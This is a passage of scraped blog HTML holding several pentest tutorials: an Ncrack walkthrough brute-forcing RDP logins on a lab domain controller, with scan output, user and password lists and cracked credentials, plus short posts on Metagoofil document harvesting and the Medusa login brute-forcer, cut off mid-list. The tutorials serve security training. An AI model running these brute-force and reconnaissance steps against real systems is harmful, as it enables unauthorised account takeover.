<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/05/12/ncrack-remote-desktop-brute-force-tutorial/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">nmap -F -iL 192.168.56.0.txt
Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST
Nmap scan report for 192.168.56.10
Host is up (0.0017s latency).
Not shown: 91 closed ports
PORT STATE SERVICE
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1028/tcp open unknown
3389/tcp open ms-term-serv
MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)
Nmap scan report for 192.168.56.101
Host is up (0.014s latency).
Not shown: 96 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-term-serv
MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)
Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth trying<br style="margin: 0px; padding: 0px;" />to pwn it.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
At this point we need to create a file (my.usr) with the probable usernames previously gathered.</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/05/12/ncrack-remote-desktop-brute-force-tutorial/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">vim my.usr
jtagle
jfeagins
hduchene
trestrepo
kmissildine</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists.</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/05/12/ncrack-remote-desktop-brute-force-tutorial/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">vim my.pwd
somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
At this point we run Ncrack against the 192.168.56.10 machine.</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/05/12/ncrack-remote-desktop-brute-force-tutorial/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1
Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST
Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'
rdp://192.168.56.10:3389 finished.
Discovered credentials for rdp on 192.168.56.10 3389/tcp:
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'
192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'
192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'
192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'
Ncrack done: 1 service scanned in 98.00 seconds.
Probes sent: 51 | timed-out: 0 | prematurely-closed: 0
Ncrack finished.</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Run the terminal server client from the Linux box</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
tsclient 192.168.56.10 use Hugh Duchene credential ‘hduchene’ ‘passw0rd’ and BINGO !!!</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<a href="http://bailey.st/blog/wp-content/uploads/2011/05/rdp1.png" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="" height="519" src="http://bailey.st/blog/wp-content/uploads/2011/05/rdp1.png" style="background-color: transparent; border: none; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" title="rdp1" width="429" /></a></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
At this point we have the control of the entire MEGACORP domain, unlimited access to all the corporate resources related to the domain. We can add users, escalate privileges of existing users, browse over the protected network resources, install backdoors and root-kits, and more and more.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<a href="http://bailey.st/blog/wp-content/uploads/2011/05/rdp2.png" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;"><img alt="" height="418" src="http://bailey.st/blog/wp-content/uploads/2011/05/rdp2.png" style="background-color: transparent; border: none; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" title="rdp2" width="541" /></a></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Final remarks.</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">For the penetration testers</strong>: don’t give up at first hurdle, there’s always another way to break in <img alt=":-)" src="http://bailey.st/blog/wp-includes/images/smilies/icon_smile.gif" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;" /> .</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">For the IT staff:</strong> Lack of password policy enforcing complexity and strength lead to a disaster.</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3436039399135336524.post-60442430362555216512012-07-16T14:14:00.000+06:002012-07-16T14:14:15.748+06:00Information Gathering using Metagoofil<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Ever wonder what documents from your web site are indexed on Google? Well, a simple running of the metagoofil script and you will see them all. This Python script is located in the /pentest/enumeration/google/metagoofil folder within Backtrack. Here is an example run:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
# python ./metagoofil.py -d mydomainname.com -l 100 -t pdf,doc -o results -f results.html</div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
This will search the domain called mydomainname.com for all PDF files and Microsoft Word DOC files, will limit the results to the first 100, will generate a html document showing the results and will download the results (all the actual files) into the results subfolder.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
To see all of the options for the script run this: #python ./metagoofil.py</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
One of the interesting things that the results file shows you is a listing of user names it found within the files.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Run this script on your domain and see what you are exposing to the world.</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-59853386119312325712012-07-16T14:13:00.000+06:002012-07-16T14:13:18.601+06:00Medusa – Multi-protocol brute force utility<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:</div>
<ul style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; text-align: -webkit-auto; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.</li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.</li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.</li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">Multiple protocols supported. Many services are currently supported (e.g. SMB, HTTP, POP3, MS-SQL, SSHv2, among others).</li>
</ul>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Available Brute force modules:</div>
<table border="0" cellpadding="0" cellspacing="0" style="background-color: #181818; border-collapse: collapse; border-spacing: 0px; border: 1px solid rgb(42, 46, 47); color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline;"><tbody style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<tr style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 1px solid rgb(42, 46, 47); margin: 0px; outline: 0px; padding: 2px 5px; vertical-align: baseline;" valign="top" width="284"><ul style="background-color: transparent; border: 0px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-afp.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">AFP</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-cvs.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">CVS</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-ftp.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">FTP</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-http.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">HTTP</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-imap.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">IMAP</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-mssql.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">MS-SQL</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-mysql.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">MySQL</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-ncp.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">NetWare NCP</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-nntp.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">NNTP</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-pcanywhere.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">PcAnywhere</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-pop3.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">POP3</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-postgres.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">PostgreSQL</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-rexec.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">REXEC</a></li>
</ul>
</td><td style="background-color: transparent; border: 1px solid rgb(42, 46, 47); margin: 0px; outline: 0px; padding: 2px 5px; vertical-align: baseline;" valign="top" width="284"><ul style="background-color: transparent; border: 0px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-rlogin.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">RLOGIN</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-rsh.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">RSH</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-smbnt.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">SMBNT</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-smtp.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">SMTP-AUTH</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-smtp-vrfy.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">SMTP-VRFY</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-snmp.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">SNMP</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-ssh.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">SSHv2</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-svn.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">Subversion (SVN)</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-telnet.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">Telnet</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-vmauthd.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">VMware Authentication Daemon</a></li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;"><a href="http://www.foofus.net/~jmk/medusa/medusa-vnc.html" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">VNC</a></li>
